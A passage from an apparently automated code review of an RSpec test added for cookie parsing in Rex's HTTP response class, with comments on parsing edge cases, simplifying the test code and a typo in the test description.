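`nil` for an absent header (not visible here), otherwise `ret = Hash.new([])` in the `else` keeps the contract uniform. Whether repeated `Set-Cookie` headers are folded into this single string is also outside the hunk; if they are joined with a comma, the parser does not split on it and the second cookie ends up inside the first value. Stylistically, `CGI::Cookie::parse` should be `CGI::Cookie.parse`, and the parenthesised `if (...)` plus the `ret` temporary are not idiomatic Ruby.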
@@ -396,6 +404,22 @@ RSpec.describe Rex::Proto::Http::Response do
 expect(cookies_array).to include(*expected_cookies)
 end
+ it 'parses cookies with inconsistent spacing and a missing trailing semicolons' do
+ resp = described_class.new()
+ resp.parse(self.send :get_cookies_spaces_and_missing_semicolon)
+ cookies = resp.get_cookies_parsed
+ names = cookies.keys.sort
+ values = []
+ cookies.each do |_, parsed|
+ parsed.value.each do |value|
+ values << value
+ end
+ end
+ values.sort!
+ expect(names).to eq(%w(k1 k2 k3))
+ expect(values).to eq(%w(v1 v2 v3))
+ end
+
 end
 end
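Review bot: The new example exercises only the happy path and so does not pin how `get_cookies_parsed` treats cookie attributes, which real responses will carry; a second fixture whose `Set-Cookie` includes `Path=/` or `Expires=` would document whether those are expected to show up as keys. The nested `each` that collects values can be `values = cookies.values.flat_map(&:value).sort`, replacing six lines, and `described_class.new()` / `self.send :get_cookies_spaces_and_missing_semicolon` can be `described_class.new` and the bare `let` name unless the file's existing examples use `self.send` deliberately. The description string should read `'parses cookies with inconsistent spacing and a missing trailing semicolon'`. The `describe` block enclosing this example starts outside the hunk.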